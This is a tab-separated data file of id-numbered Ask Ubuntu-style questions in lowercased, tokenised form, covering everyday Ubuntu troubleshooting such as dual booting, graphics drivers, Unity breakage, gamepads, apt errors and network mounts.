476361	run shell script on connection to network connection , but as user	i want to run a script when i 'm connecting to a specific network , but only when i 'm logged in . i know about cuttlefish , but it 's not being maintained . this is not a duplicate of the other question , as i have tried that , but if-up.d works all the time . i do n't want that . i want it to run when i 'm logged in , and only when i 'm logged in . it does n't matter if the network is wireless or not , as i 'm already parsing iwconfig to figure out what network i 'm connected to .
476363	set up wheel emulation lock key with evdev	i have a trackball and i 've just figured out how to enable wheel emulation with xinput . it 's good to have the option , but it is a little painful having to hold down a button while scrolling . if possible , i 'd like to map a key from my keyboard to toggle wheel emulation for my trackball . it does n't seem like this behaviour is supported , but perhaps someone here knows of or has written a patch / hacked up script to accomplish it ? thanks !
476364	installation from usb fails at network time	i am installing to an older acer aspire laptop with a new , empty ssd drive . the laptop previously worked well as a dual boot , so we put in a new ssd to make it a dedicated ubuntu machine . install from a usb key seemed to go ok , but hung at the network time step . hard reset led to a condition where the usb image wo n't start properly . it reports that the hard drive has no more space , then it complains about the video settings , but wo n't auto-detect or allow manual settings . any suggestions ? i am preparing a dvd image and a fresh copy of the usb drive , on the theory that one of the files on the usb got corrupted . do you need to have hard drive space in order to run ubuntu from the usb ? should i move the ssd to another pc to reformat before trying again ? thanks , howard ps not a linux user and brand new to ubuntu
476366	multimedia keys in ubuntu stopped working	my multimedia keys stopped working in ubuntu , it used to work just fine ( clementine , rhytmbox ) now nothing , even custom mapping in clementine does not work . it is still working in kde . any ideas ?
476367	dual boot please help	i have a hp envy m6 notebook . running windows 8.1 genuine on my machine , i want to know how to install ubuntu 14.04 on my machine as a dual boot ? please give me a proper guide . and also tell me can i run adobe photoshop cc and lightroom 5.4 on ubuntu ?
476371	how do i use maas to prepare to install openstack ?	i have a set of servers and i would like to install openstack , how can i install openstack with metal-as-a-service ( maas ) ?
476373	gamepad detected by lsusb but not by pcsx or jstest-gtk in ubuntu 14.04	i had been using a ps3 gamepad on pcsx for a while on ubuntu 14.04 , but realized it stopped working today . the controller is detected by lsusb on terminal , but it does not appear in pcsx or jstest-gtk . bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 10f1:1a43 importek bus 001 device 007 : id 0930:0219 toshiba corp . bus 001 device 003 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 012 : id 054c:0268 sony corp. batoh device / playstation 3 controller bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i can confirm that this is a problem specific to trusty , since i tried to use the controller in a laptop with precise and it worked correctly . edit 29 june just found out that udev seems to be broken , and that this is a bug affecting several users . apparently , the way of making it work is to create your own udev rules , but that at the moment goes beyond my capability .
476374	ubuntu 14.04 unity broken no launchbar menu bar	i tried installing nvidia 331.79 driver from xorg-edger ppa , but after installation the unity is broken that no launchbar and no menu bar . the login screen worked properly but right after i logged in i could not do anything ( no launchbar but right-click on desktop was working ) , even ctrl+alt+t failed to trigger a terminal session . i pressed ctrl+alt+f1 switching to command console to login ( no gui ) . i restored to official repository nvidia 331.38 driver but the same problem ( no launchbar ) still persisted after login . i also tried the command unity -- replace but it did not help . by googling the error message of unity -- replace i came to a knowledge page of `` parallels '' shown below . i have no parallels installed but the page just described exactly same error message and syndrome ( no launchbar ) , so i followed its instructions and it just worked ( restoring my launchbar and menu bar ) ! http : //kb.parallels.com/121300 these are the main commands i ran following the page 's instructions , where `` xxxxxxxx '' is the backup timestamp of my xorg.conf file . sudo mv /etc/x11/xorg.conf.xxxxxxxx /usr/share/x11/xorg.conf.d/xorg.conf export display=:0 gsettings reset org.compiz.core : /org/compiz/profiles/unity/plugins/core/ active-plugins i know the first line was moving a backup file , could anyone explain the purpose of other two lines and why they helped me to resolve the issue ? afterward i checked the folder /usr/share/x11/xorg.conf.d but i did not find the file xorg.conf which was supposed i moved there by the first command . i want to know why it helped me , and why the xorg.conf file was not found afterward . many thanks !
476381	ubuntu 14.04 nvidia setting empty	i upgraded to ubuntu 14.04 in apr using official repository nvidia-331.38 driver . i just noticed a few days ago that the nvidia-setting screen is basically empty , no advance settings i can see , screenshot attached . i remember i saw this screen before ( other driver versions in 13.10 and earlier ) that had a number of advance settings . is my driver installation corrupted ? does anyone know how to enable the advance settings ? thanks !
476382	reboot after upgrade ( 13.10 to 14.04 ) does n't work	the upgrade went fine , but after the reboot i cant start ubuntu . i can get into recovery mode but when i select a option there , it comes to a shell and nothing happen . could anybody help me please : ) ?
476383	ubuntu 14.04 audio problem	i am new to ubuntu . lately i have installed ubuntu 14.04 , everything was working fine . until i noticed that sound is not working . i searched in google and in different forums and sadly have n't found any solution . my motherboard is gigabyte sniper m5 with creative sound core 3d chip . i have made an alsa information script , here 's the link : http : //www.alsa-project.org/db/ ? f=d713beeccbdafbc54a70e13c73271ce534dfb4a2 it 's the only problem i have , the rest is perfect . any help would be much appreciated .
476386	mouse cursor flickering solution not working	i installed ubuntu 14.04 and there is a problem with mouse flickering i know that there is a thread with this question mouse cursor flickering and disappearing but once i disable the unknown display ... the flickering disappears.. but my screen size is 60 % of what it used to be.. i have 20 % dead band ( black vertical bands ) on right and left portion of my screen ... its terrible..
476389	installed ubuntu 14.04 using the `` erase entire disk '' on windows 8	i wanted to have dual boot of ubuntu 14.04 on my windows 8.1 . but then out my ignorance/careless ness i have selected the option 'erase entire disk ' and later after rebooting i realized that the windows boot option is not prompting and it is directly booting to ubuntu . however , in windows shares i am able to see my windows logical partitions but failed to access the same due to some password issue . my questions ? have i removed windows on my laptop completely ? if yes , how am i able to see my windows logical partitions on windows shares ? well , now my biggest concern is i have very important data on my windows partitions and i would be destroyed if i lose that data . so , can someone help me out safely getting back to my windows and access my data ( honestly , i had enough with ubuntu will never mess with any other operating system other than my native windows ) hardware description : laptop make hp envy i5 , windows 8.1 pre loaded with a recovery partition ( unfortunately i donot have the recovery disks with me and the recovery option f11 is not working on the boot ) please people help me out .
476390	solved bleachbit : how to completely clear url history in firefox ?	14.04 / firefox 29.0 i 've been using bleachbit to clear usage/file history , and for the most part it works great . however , it does n't seem to clear the website hostnames out of the url , at all . these addresses are not bookmarked . also , the total url is n't preserved , just the hostname . visit site http : //www.bluesnews.com/some_random_url_string exit firefox run bleachbit , with all firefox options selected restart firefox check history : completely empty , other than bookmarked sites . www.bluesnews is not bookmarked type `` blue '' which is firefox automatically completes as `` http : //www.bluesnews.com/ '' alternate step # 3 : use firefox 's built-in `` clear history '' and select all entries with a time frame of `` everything '' . same result as above . my inquiry in bb forums has n't been responded to . i found dan 's proposed solution , however changing autocomplete in about : config only turns off the function , it does n't actually stop storing urls . solved - see my comment in the `` answer '' response from tim
476394	how to know what is the model of my wireless card ?	i am looking for command line which tells me what is the model of my wireless card ? for example if that is atheors . the result should be atheros .
476397	how do i prepare maas to serve images on openstack ?	i 've got openstack ready with maas , how do i prepare the cloud with ubuntu images so i can deploy it with juju ?
476399	ubuntu 10.04 web server	i have a web server running ubuntu 10.04 that we can access with ftp but when we try to access it with http doesnt come up . the issue is we have an old application on this server that we would like to access online again but we only want to be able to access it internally so we are trying to internally host the sites on the server with no success can anyone help me with this issue ?
476404	what is the `` m '' in my python installation	i found this when playing with python /usr/lib/python3.4m/ along side /usr/lib/python3.4/ what is the purpose of this ?
476406	issue updating the server , or connecting to the internet although ssh remote access is working	i am able to ssh into my box running ubuntu 14.04 but i am not able to update nor can i ping any out side sites such as ping cnn.com any ideas what could be wrong here
476407	alias/function with command line arguments	i 'm tired of typing manage.py startserver 10.211.55.4:4000 , so decided to make an alias for that . only thing is : the port sometime changes . so i did this in bash profile : function runserver ( ) { python manage.py runserver 10.211.55.4 : $ 1 } but then when i call it : runserver 3000 , it starts it , but immediately stops saying : '' error : that ip address ca n't be assigned-to '' . however if i type the same thing right into command line it works with no complains .
476409	error on download ubuntu one files after shutdown	i 'm trying to download my files from ubuntu one service using the `` download all your files as .zip file '' , but every time i try to download the zip file it stops the download before it was finished and then i got a broken zip file . what can i do to get my ubuntu one files ? ( currently i do n't have then synced on my notebook ) . thanks .
476410	is it possible to reveal the gnome3 launcher just by moving the pointer near the left hand side ?	is it possible to reveal the gnome3 launcher by just moving the mouse to the left hand side of the screen ? sometimes i just want to quickly flick my mouse to the left to reveal the launcher , but instead i have to go up to activities and then down to the launcher .
476412	i am trying to share a file between windows 7 ( host ) and ubuntu 12.04.4 ( guest ) , using virtual box 4.3.12	i have put the folder ( winshare ) , it has some data in it , that i need under virtual machine -- -settings -- -shared folders -- -machine folders , and in ubuntu i have created the directory ~/media/winshare . the guest additions have been installed and i ran the command , sudo mount -t vboxsf winshare /media/winshare , from there the command executes just fine , no errors , but when i move into ~/media/winshare the data under my windows winshare file does not show up in ubuntu . why is this ? thanks for the help !
476413	xfce is consuming much ram	i am using ubuntu 12.04 lts and have 9gb ram . so i had unity desktop environment , and then i installed xfce4 and xfce4-goodies : sudo apt-get install xfce4 xfce-goodies then i removed unity using : sudo apt-get remove unity unity-2d unity-2d-panel unity-2d-spread unity-asset-pool unity-services unity-lens-files unity-lens-music unity-lens-applications gir1.2-unity-5.0 unity-common indicator-sound indicator-power indicator-appmenu libindicator7 indicator-application indicator-datetime indicator-messages libnux-2.0-0 nux-tools libunity-misc4 unity-2d-common sudo reboot now i see xfce is using almost 2.4gb ram out of total 9gb ! how ? any solution ?
476414	what version of megacli should i download for h710p ?	i am using dell perc h710p adapter . when trying to download megacli from lsi , someone suggested to check the parameter like . % lspci -v | grep lsi when i run this command , i got . 03:00.0 raid bus controller : lsi logic / symbios logic megaraid sas 2208 [ thunderbolt ] ( rev01 ) but when i check the lsi website , i do n't see the number `` 2208 '' , most are starting with 8xxx or 9xxx . so which version i should pick to download ? or in general , how do i get the software to manage h710p ? thanks a lot for the help .
476417	preload stuff automatically ?	is there a way to configure preload or another thing that does the same thing to pre-load chrome or other specific applications by default ? i rarely run out of ram and use this machine for browsing and video only pretty much . start-up time for chrome without preload is pretty slow , so i 'm looking into getting it auto 'pre-loaded ' at boot . i use lubuntu 14.04 if that matters .
476423	google chrome installation error	i used to use google chrome as default browser . one day i tried to use google cast extension to send my browser screen to chromecast , but i realized that my chrome version was old . so i downloaded the debian package from google web site , but i ran on a dependency failure : $ sudo dpkg -i /home/plinio/downloads/google-chrome-stable_current_amd64.deb ( reading database ... 195156 files and directories currently installed . ) preparing to replace google-chrome-stable 35.0.1916.114-1 ( using ... /google-chrome-stable_current_amd64.deb ) ... unpacking replacement google-chrome-stable ... dpkg : dependency problems prevent configuration of google-chrome-stable : google-chrome-stable depends on libnss3 ( > = 3.14.3 ) ; however : version of libnss3 on system is 3.14.1-0ckbi1.93ubuntu.0.12.04.1 . dpkg : error processing google-chrome-stable ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : google-chrome-stable how to solve it ? i had no success with synaptc and ubuntu software center as well . [ edit ] i 'm using ubuntu 12.04 lte [ edit2 ] stack exchange mobile app is awesome ! thanks for it i could keep asking ubuntu even without network access in my workstation : d
476428	mount secure webdav with davfs2 ssl error	i try to mount my secure webdav on my ubuntu notebook , i 've added the following to my fstab : https : // [ url ] /mnt/ [ folder ] davfs user , auto , uid=wouter0100 , file_mode=600 , dir_mode=700 0 1 but when i run the command sudo mount -a i keep getting : /sbin/mount.davfs : mounting failed . server certificate verification failed : issuer is not trusted i 've tried very much different things , but i could n't get it working.. it 's signed by comodo and valid ( when i load it in chrome it 's okay ) .
476432	change nickname in xmpp room	on pidgin , i could set what my nickname is for a chat room by changing the room settings . i do not seem to have any such option to change nickname ( or alias ) for `` favorite rooms '' in empathy . in pidgin , i could also use the /nick command to change my nickname . this also does not seem to be supported . how do i change my nickname for a favorite room in empathy ?
476441	can not locate packages for citrix install	i 'm trying to get a citrix receiver installed on to ubuntu 14.04 ( 64 bit ) following ubuntu 's docs . the first line of instructions say to get these required packages : sudo apt-get install libmotif4 : i386 nspluginwrapper lib32z1 libc6-i386 libxp6 : i386 libxpm4 : i386 libasound2 : i386 but if i paste in that line , i get this error : reading state information ... done e : unable to locate package libmotif4 e : unable to locate package libxp6 e : unable to locate package libxpm4 e : unable to locate package libasound2 my repository settings are below . is there anything i 'm missing in there ? otherwise what do i need to do to install these ? $ cat /etc/apt/sources.list deb cdrom : [ ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) ] / precise main restricted deb cdrom : [ ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) ] / trusty main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty main restricted # added by software-properties deb http : //archive.ubuntu.com/ubuntu/ trusty main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu/ trusty main restricted universe multiverse # added by software-properties deb http : //security.ubuntu.com/ubuntu/ trusty-security main restricted universe multiverse deb-src http : //security.ubuntu.com/ubuntu/ trusty-security main restricted universe multiverse # added by software-properties deb http : //archive.ubuntu.com/ubuntu/ trusty-updates main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu/ trusty-updates main restricted universe multiverse # added by software-properties deb http : //archive.ubuntu.com/ubuntu/ trusty-proposed main universe restricted multiverse deb http : //archive.ubuntu.com/ubuntu/ trusty-backports main universe restricted multiverse
476444	when running `` sudo python setup.py install '' there are binaries not found	i need to install the program mrcwa-20080820 ( sourceforge.net/projects/mrcwa/ ) because a summer project that i am involved . i need to use it together with anaconda ( store.continuum.io/cshop/anaconda/ ) , i already installed anaconda and apparently it is working . when i type : conda -- version i got the expected answer . conda 3.5.2 if i tried to import numpy or scipy with python or simple type f2py there are no errors . so far so good . but when i tried to install this program sudo python setup.py install i got these errors : running install running build sh : 1 : f2py : not found cp : can not stat âmrcwaf.soâ : no such file or directory running build_py running install_lib running install_egg_info removing /usr/local/lib/python2.7/dist-packages/mrcwa-20080820.egg-info writing /usr/local/lib/python2.7/dist-packages/mrcwa-20080820.egg-info obs : i am trying to use intel fortran 64-bits and ubuntu 14.04 lts . so i was checking f2py and tried to execute the program hello world f2py -c -m hello hello.f from here : cens.ioc.ee/projects/f2py2e/index.html # usage and i had some problems too : running build running config_cc unifing config_cc , config , build_clib , build_ext , build commands -- compiler options running config_fc unifing config_fc , config , build_clib , build_ext , build commands -- fcompiler options running build_src build_src building extension `` hello '' sources f2py options : [ ] f2py : > /tmp/tmpf8p4y3/src.linux-x86_64-2.7/hellomodule.c creating /tmp/tmpf8p4y3/src.linux-x86_64-2.7 reading fortran codes ... reading file 'hello.f ' ( format : fix , strict ) post-processing ... block : hello block : foo post-processing ( stage 2 ) ... building modules ... building module `` hello '' ... constructing wrapper function `` foo '' ... foo ( a ) wrote c/api module `` hello '' to file `` /tmp/tmpf8p4y3/src.linux-x86_64-2.7 /hellomodule.c '' adding '/tmp/tmpf8p4y3/src.linux-x86_64-2.7/fortranobject.c ' to sources . adding '/tmp/tmpf8p4y3/src.linux-x86_64-2.7 ' to include_dirs . copying /home/felipe/.local/lib/python2.7/site-packages/numpy/f2py/src/fortranobject.c - > /tmp/tmpf8p4y3/src.linux-x86_64-2.7 copying /home/felipe/.local/lib/python2.7/site-packages/numpy/f2py/src/fortranobject.h - > /tmp/tmpf8p4y3/src.linux-x86_64-2.7 build_src : building npy-pkg config files running build_ext customize unixccompiler customize unixccompiler using build_ext customize gnu95fcompiler could not locate executable gfortran could not locate executable f95 customize intelfcompiler found executable /opt/intel/composer_xe_2013_sp1.3.174/bin/intel64/ifort customize laheyfcompiler could not locate executable lf95 customize pgroupfcompiler could not locate executable pgfortran customize absoftfcompiler could not locate executable f90 could not locate executable f77 customize nagfcompiler customize vastfcompiler customize compaqfcompiler could not locate executable fort customize intelitaniumfcompiler customize intelem64tfcompiler customize intelem64tfcompiler customize intelem64tfcompiler using build_ext building 'hello ' extension compiling c sources c compiler : gcc -pthread -fno-strict-aliasing -g -o2 -dndebug -g -fwrapv -o3 -wall -wstrict-prototypes -fpic creating /tmp/tmpf8p4y3/tmp creating /tmp/tmpf8p4y3/tmp/tmpf8p4y3 creating /tmp/tmpf8p4y3/tmp/tmpf8p4y3/src.linux-x86_64-2.7 compile options : '-i/tmp/tmpf8p4y3/src.linux-x86_64-2.7 -i/home/felipe/.local/lib/python2.7/site-packages/numpy/core/include -i/home/felipe/anaconda/include/python2.7 -c' gcc : /tmp/tmpf8p4y3/src.linux-x86_64-2.7/hellomodule.c in file included from /home/felipe/.local/lib/python2.7/site-packages/numpy/core/include/numpy/ndarraytypes.h:1761:0 , from /home/felipe/.local/lib/python2.7/site-packages/numpy/core/include/numpy/ndarrayobject.h:17 , from /home/felipe/.local/lib/python2.7/site-packages/numpy/core/include/numpy/arrayobject.h:4 , from /tmp/tmpf8p4y3/src.linux-x86_64-2.7/fortranobject.h:13 , from /tmp/tmpf8p4y3/src.linux-x86_64-2.7/hellomodule.c:17 : /home/felipe/.local/lib/python2.7/site-packages/numpy/core/include/numpy/npy_1_7_deprecated_api.h:15:2 : warning : # warning `` using deprecated numpy api , disable it by `` `` # defining npy_no_deprecated_api npy_1_7_api_version '' [ -wcpp ] # warning `` using deprecated numpy api , disable it by `` \ ^ gcc : /tmp/tmpf8p4y3/src.linux-x86_64-2.7/fortranobject.c in file included from /home/felipe/.local/lib/python2.7/site-packages/numpy/core/include/numpy/ndarraytypes.h:1761:0 , from /home/felipe/.local/lib/python2.7/site-packages/numpy/core/include/numpy/ndarrayobject.h:17 , from /home/felipe/.local/lib/python2.7/site-packages/numpy/core/include/numpy/arrayobject.h:4 , from /tmp/tmpf8p4y3/src.linux-x86_64-2.7/fortranobject.h:13 , from /tmp/tmpf8p4y3/src.linux-x86_64-2.7/fortranobject.c:2 : /home/felipe/.local/lib/python2.7/site-packages/numpy/core/include/numpy/npy_1_7_deprecated_api.h:15:2 : warning : # warning `` using deprecated numpy api , disable it by `` `` # defining npy_no_deprecated_api npy_1_7_api_version '' [ -wcpp ] # warning `` using deprecated numpy api , disable it by `` \ ^ compiling fortran sources fortran f77 compiler : /opt/intel/composer_xe_2013_sp1.3.174/bin/intel64/ifort -fi -fpic -xhost -openmp -fp-model strict fortran f90 compiler : /opt/intel/composer_xe_2013_sp1.3.174/bin/intel64/ifort -fr -fpic -xhost -openmp -fp-model strict fortran fix compiler : /opt/intel/composer_xe_2013_sp1.3.174/bin/intel64/ifort -fi -fpic -xhost -openmp -fp-model strict compile options : '-i/tmp/tmpf8p4y3/src.linux-x86_64-2.7 -i/home/felipe/.local /lib/python2.7/site-packages/numpy/core/include -i/home/felipe/anaconda/include/python2.7 -c' ifort : f77 : hello.f /opt/intel/composer_xe_2013_sp1.3.174/bin/intel64/ifort -shared -shared -nofor_main /tmp/tmpf8p4y3/tmp/tmpf8p4y3/src.linux-x86_64-2.7/hellomodule.o /tmp/tmpf8p4y3 /tmp/tmpf8p4y3/src.linux-x86_64-2.7/fortranobject.o /tmp/tmpf8p4y3/hello.o -l/home/felipe /anaconda/lib -lpython2.7 -o ./hello.so removing build directory /tmp/tmpf8p4y3
476447	what does the 'sudo -s ' command do , and how is it used in this example ?	i have the following doubt . in a tutorial related to a software installation that i am following say that i have to execute the following commands ( i am doing it into an ssh shell , so this list of steps end with the exit command ) : sudo -s apt-get update apt-get install -y build-essential libtool libcurl4-openssl-dev libncurses5-dev libudev-dev autoconf automake screen exit my doubts are : what exactly does the -s parameter do after sudo command ? searching on the web i found that : ‑s [ command ] the ‑s ( shell ) option runs the shell specified by the shell environment variable if it is set or the shell as specified in the password database . if a command is specified , it is passed to the shell for execution via the shell 's ‑c option . if no command is specified , an interactive shell is executed it seems to me that the sudo -s execute a command using the environment variable of the shell . but this is not clear for me : in this case what is the command executed with the environment variable ? ( it only executes sudo -s and not sudo -s [ command ] ) .
476448	question about dual boot	i 've been thinking , if i will make my computer dual boot , does that mean i can do whatever on one account like installing stupid things such as netflix , spotify , skype and some apps that i 'm curious about . and only have something that you know is pretty safe to install on the other ? for example if an attacker would gain access to my , ,stupidâ account does that mean he/she/they/it would also gain access to my , ,safeâ account ? and the million dollar question , can i mess around ( nothing heavy ) and learn on ubuntu on the account for stupidity and that would not affect the other account if i would make some huge mistake ?
476450	control panel in ubuntu server	can i have two different control panels running in the same ubuntu server ? like ehcp and ispconfig thx
476456	upgrading from natty 11.04 to 14.04	when i try to upgrade from natty 11.04 i get an error message saying `` failed to download repository information . check your internet connection . '' it looks like i 'm connected to the internet .
476461	apt -get not executing : command line option g ( from get ) not known	i 'm fairly new to ubuntu and using a unix shell . i 'm working with ubuntu 14.04 i 'm getting an unusual error when i try using the apt get command for any purpose . > > shreya : ~ $ sudo apt -get install openssh-server running a command like this , or any other command with the apt -get method , gives me the following . > > e : command line option 'g ' [ from -get ] is not known . i ca n't find any documentation elsewhere which can give me any pointers . suggestions , any ? : )
476463	libmcrypt - how to compile and install from source in 14.04	how can i compile and install libmcrypt from source in 14.04 i used instructions to another version of ubuntu , and i have failed .
476466	video language converters	are there any video converters which are capable of converting language of the video to any language we want in ubuntu . if any specify . thank you
476467	how do i get a gamepad to work ? ( ubuntu 14.04 , xbox 360 controller )	i have a wired usb gamepad , and really want it to work on my new linux gaming pc i built . i 've installed 'jstest-gtk ' and 'xboxdrv ' and 'joystick ' and they seem to be working , but no game will recognize that the controller is even there ( btw , i am talking about games with full controller support , so it is n't so much a problem with the games . also , the gamepad does work , at least it has on my windows machine , and jstest-gtk recognizes it 's existence ) ! i 'm assuming that it has to be something with the way the input is located , because when i run xboxdrv ( sudo xboxdrv -- silent ) , it tells me something about it being available as dev/input/js0 or dev/input/event14 . maybe the games are looking for joystick input from another directory and thus are n't receiving anything ? any help would be appreciated .
476469	wifi not connecting on ubuntu 14.04	i 've recently booted ubuntu into my hp pavilion g4 . however , my computer is n't trying to look for any available wifi networks . i checked and my wireless lan is neither hardblocked nor softblocked . i tried installing the b43 driver , but that does n't seem to work either . i ran this script that extracts information about the wireless connections on my laptop , as suggested on the forums , and i 've pasted the results of that script here , if it helps ! http : //pastebin.ubuntu.com/7579062/ any suggestions what might be the problem ?
476470	grub installation failed with fresh installation 14.04 on vmware esx 5.1	i 'm trying to install server 14.04 on vmware esx 5.1 and received grub installation failed error grub-pc package failed to install into /target/ i used normal bios , not efi . tried only installing openssh service did not help . tried with and without lvm when creating partition . how can we resolve this issue ?
476473	how can i open multiple windows in one application , and show them at the same time ?	example scenario : let 's say i 'm on my desktop and i do the following : open a full-screen window in application a open two half-screen windows ( tiled to the left and right ) in application b go back to the desktop ( with ctrl+super+d ) show the first window ( application a ) . move the mouse over the icon of application b scroll the scroll wheel when i do this , i get the first window that was tiled to the right , and i see application a in the background . so far , everything is good . scroll the scroll wheel again ( to try to see the second window of application a ) here 's when the problem occurs . when i try doing this , the first window from application b disappears , and the second window shows . i still see application a in the background where the first window of application b used to be . 7a . ( expected result ) both windows of application b are visible , and application a is covered up in the background here 's a small diagram : 6 . bbbbaaaa 7 . aaaabbbb 7a . b1b1b2b2 ( expected ) bbbbaaaa aaaabbbb b1b1b2b2 bbbbaaaa aaaabbbb b1b1b2b2 how can i achieve this expected result ? right now i 'm sticking the mouse to the left edge of the screen and clicking the icon to get the `` open windows '' dialog thingy and opening both manually , but there must be a quicker and more efficient way .
476476	clicklock function ?	is there a way to enable `` clicklock '' function of a mouse ? i recently switched to ubuntu and ca n't seem to access it like i could on windows . google has not come up with anything either . thank you for any help !
476477	unity broken with amd/ati graphics with 13.10 after latest kernel upgrade	i am running ubuntu 13.10 using an amd/ati graphics card gallium 0.4 on amd rs880 . since the last kernel update unity no longer works . when i log in i only get the desktop wallpaper - no unity panel or top panel . also , if i start an application it will have no frame . i have tried numerous fixes . i am using the open source amd/ati driver wrapper from xserver-xorg-video-ati . i can not use fglrx at all ( i have tried on numerous occasions but my laptop will only boot into the low-res graphics version ) . i have checked ccsm and the unity plugin is checked . i have come across numerous fixes on the web but none have worked . these including reinstalling unity , ubuntu-desktop , compiz , as well as reseting them all . i am currently logged in using gnome , which works fine , but i would like to have unity back . it only stopped working on the last update . i have tried booting to the previous kernel but that does not work . any help warmly appreciated .
476480	how to reset dhcp poolin ubuntu server 14.04 ?	would like to know how to reset the dhcp pool in ubuntu server 14.04 , as i would like the server to advertise ip-addresses beginning from the start /first ip of the pool . could anyone help please ? many thanks
476481	how can i re-order the activities in kde ?	i would like to be able to manually edit the order of my activities in kde . they are not listed in alphabetic order or the order that they are created , yet i have n't figured out how to change this order or how this order is set . the obvious thing to try , drag-and-drop , does not work . i also have n't found were the order is set ( closest thing i 've found is ~/.kde/share/config/activitymanagerrc i 'm using kubuntu 14.04 . my kdelibs version is 4.13.0 .
476483	does the network proxy run after the vpn connection , no leakage whatsoever ?	i 'm inside a ubuntu 12.04 virtualbox guest ( bridged adapter ) and by finding 'network ' in the gui , i can access three things , a vpn which i 've configured to be an openvpn to a vpn , a 'wired ' connection which i assume refers to the wired connection that came as default when the virtualbox or the guest additions were installed ( even though this is a wifi ) , and a 'network proxy ' which can be applied 'system-wide ' . neither the proxy nor the vpn will work without the 'wired connection ' , of course . but the network-proxy and the openvpn do n't depend on each other to work alright , that too is obvious . but what happens when i connect both ? well , the proxy shows on the browser instead demanding authentication details as soon as i open the browser , but so much for 'system-wide ' , i get a 407 when apply the proxy in such a way ( i assume i have to configure a file to get it working for curl , that 's ok i just have n't gone with the trouble because it 'd probably take me quite some time ) . what i 'd like to know is , as i can see system-wide did n't work quite so automatically well in practice , can there also be an issue in that the proxy may be overwriting the openvpn and connecting directly to my home ip , instead of nesting inside/chaining after the openvpn itself ? i 've done things like run traceroute through terminal but i could n't make head or tail of it .
476485	copy several files	i have a list of files , and i want to generate several copies of them . the copies should be numbered . for example , i have the files : filea , fileb , ... , filec the first copy should generate the files filea1 , fileb1 , ... , filec1 the second copy , the files filea2 , fileb2 , ... , filec2 and so on , until a specific number of copies is reached . what commands can i use to accomplish this from the terminal ?
476486	empathy & gchat keep bouncing	ok this is an odd one . just started today . jabber via empathy disconnects but it still looks like i am online . i can even send ims though they never reach their destination . seeming at the same time gchat in gmail in chrome disconnects . this is more obvious as it tells you ca n't connect . but it does come back online after a few moments . logs are clean . never miss pings . happens in both wifi and hardwire . i will post updates as i troubleshoot .
476487	windows 7 not showing up	in windows 7 i went into system settings and made my default operating system ubuntu instead of windows but when i rebooted my computer windows was gone . i did this because it was not letting me boot ubuntu after i installed it and it worked but i did not want to get rid of windows please help
476492	how to do a dual boot of two ubuntu operating systems ?	this problem is little bit different than other similar ones . i have a clone image of ubuntu production system and plan to propagate it to two different partitions ( e.g. , /dev/sda1 , /dev/sda2 ) . how to set it up so that the user can choose which one to boot ? below is what i did so far . 0. boot from rescue cd 1. add a new file /etc/grub.d/11_boot_2 in /dev/sda1 2. point uuid in 11_boot_2 to /dev/sda2 3. chroot to /dev/sda1 , and run update-grub 4. modify /etc/fstab in /dev/sda2 to use different mount point when rebooting , the grub menu shows the second boot option . but after choosing it , the boot ends in ( initramfs ) prompt . the uuid should be correct , because otherwise the boot will print error like `` no such filesystem '' . so my questions are : ( 1 ) is any step above wrong , or did i missing anything ? ( 2 ) at the initramfs stage , what could i do to trouble-shoot ? ( 3 ) is there anyway to enter `` grub rescue '' ? i end up in grub rescue before and i can test boot there . but this time , the system did n't stop at grub rescue . ( 4 ) exactly what stage is initramfs during the whole boot process ? that may tell me what is right so far , and what may be wrong . thank you so much for the help !
476494	how to create a script to launch several emulated rom inside a folder	i would like to create a script to run simultaneously all the n64 roms that i put inside a folder , reading the names from a text file . since now i did a script like this : cat ./listn64_full.txt | while read line ; do mupen64plus $ line echo `` | '' done the problem is that when the first emulated rom is launched the script stops and i have to close the active window to run the second one . how should i edit that script to load all them together ? the pipe seems does n't work ... thanks ! ! !
476496	hyperlinks in thunderbird do n't work	i recently upgraded from 12.04 to 13.10 and links in thunderbird do n't work , i.e . do n't launch or open in firefox . i have double checked that firefox is still the default browser : > > sudo update-alternatives -- config x-www-browser there are 2 choices for the alternative x-www-browser ( providing /usr/bin/x-www-browser ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/bin/google-chrome-stable 200 auto mode * 1 /usr/bin/firefox 40 manual mode 2 /usr/bin/google-chrome-stable 200 manual mode i have checked it is not an add-on by running thunderbird in safe-mode . in the config editor of thunderbird i have checked that 'network.protocol-handler.external-default ' is set to 'true ' . i have also added 'network.protocol-handler.app.http ' to the config ( linking to /usr/bin/firefox ) to no avail .
476497	hovering the top bar maximizes window	i have compizconfig manager installed , grid enabled by default ( i like it ) . but if i have a window open half way and hover at the top black bar it maximizes the window . does anyone know where i can change that option ? im using 14 lts , it 's pretty amazing .
476498	looking for a terminal	can someone tell me what kind of terminal is used in the following figure : does it color text that way ? if not , is there any plugin for that ?
476499	unity not working-tried to fix through compizconfig settings manager	after long , hard trial and error , and reading other questions here , on ask ubuntu , i was able to type some code on ctrl+ alt+ f1 or f2 , it does n't really matter , i then typed either cd /usr/bin and then ./ccsm or /usr/bin/ccsm then i pressed ctrl+alt+f7 and up popped ccsm without the exit bars or file bars and nothing with unity . i unchecked `` windows decorations '' ( my problem ) , and re checked everything i needed , including unity plugin , then i clicked close and rebooted from the ctrl+alt+f1 terminal , and logged in , still no unity . tried it multiple times , someone please help , and figure if i 'm missing something . signed , snakeblood9
